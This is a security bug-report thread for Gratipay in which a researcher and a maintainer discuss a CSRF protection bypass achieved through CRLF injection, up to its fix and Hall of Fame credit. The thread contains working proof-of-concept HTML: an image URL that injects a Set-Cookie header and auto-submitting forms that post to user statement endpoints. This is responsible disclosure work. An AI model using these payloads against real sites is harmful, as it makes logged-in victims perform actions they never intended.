CSRF Protection Bypass

[chadwhitacre]

https://gratipay.freshdesk.com/helpdesk/tickets/2305

== CSRF Protection Bypass (Chrome, Internet Explorer) ==

1. Change name in form action to victim name
2. Open html PoC

<img src="http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;">

Result in attach

[chadwhitacre]

I tried with this poc, and was not able to reproduce his result (except when I was logged in as the target, or as an admin):

<img src="http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;">
<form action="https://gratipay.com/~lgtest/statement.json" method="POST">
    <input type="hidden" name="csrf_token" value="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
    <input type="hidden" name="lang" value="en">
    <input type="input" name="content">
    <button type="submit">Submit</button>
</form>

[chadwhitacre]

To: [researcher]

The first issue you reported has already been reported [https://github.com/gratipay/security-b50267/issues/1].

The second and third are new reports. I've confirmed your result for the second report [https://github.com/gratipay/security-qf35us/issues/1], and we'll be happy to add you to our Hall of Fame when we fix that bug.

I haven't yet reconstructed the HTML PoC you used for the third report. Are you able to provide that?

Thanks for the reports!

[chadwhitacre]

From: [researcher]

Hi, this CSRF bypass uses CRLF Injection. (Do not forget to change the name in the form action)

<form id="csrf" action="https://gratipay.com/~fickov/statement.json" method="POST">
<input type="hidden" name="lang" value="en" />
<input type="hidden" name="content" value="CSRF&#95;TEST" />
<input type="hidden" name="csrf&#95;token" value="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" />
<input type="submit" value="Submit request" />
</form>
<img src="http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;" onerror="csrf.submit()">

[chadwhitacre]

Right. The point of a CSRF is to initiate an action on Gratipay for a logged-in user, when that logged-in user visits a third-party website. My poc reconstruction was accurate, I was just not interpreting the results properly.

[chadwhitacre]

To: [researcher]

Thanks, []. Bug confirmed. I'll contact you again when we've fixed it.

[chadwhitacre]

Deploying gratipay/security-qf35us#2 ought to fix this.

[chadwhitacre]

Confirmed fixed.

[chadwhitacre]

To: researcher

The CRLF Injection and CSRF Protection Bypass bugs should be fixed now. Please confirm.

I've added you to our legacy Halls of Fame for Aspen (for the CRLF injection) and Gratipay (for the CSRF protection bypass):

http://aspen.io/security.txt
https://gratipay.com/about/security/hall-of-fame

We've now migrated our security program to HackerOne. If you would like acknowledgement on HackerOne feel free to re-file the bugs there and I will resolve them.

Thanks for the reports! :-)